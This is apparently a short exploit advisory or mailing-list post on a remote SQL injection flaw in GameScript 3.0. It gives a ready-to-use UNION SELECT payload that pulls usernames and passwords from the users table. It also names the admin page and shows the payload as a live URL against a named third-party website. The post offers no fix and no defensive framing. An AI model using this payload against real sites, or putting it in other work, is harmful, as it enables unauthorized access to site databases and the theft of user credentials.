GameScript version 3.0 suffers from a remote SQL injection vulnerability.
45a1c144b40020782b9154b6b792d647ff8a03db40c9fa3cdab3b3b17b0731f1
Author : FormatXformat
Home : Tkurd.net
Script : http://www.gamescript.net
Vulnerabilities : SQL Injection
Dork:
Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.
Exploit:
/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
Admin page: admincp
Demo :
http://www.kraloyunlarim.com/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--
________________________________
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>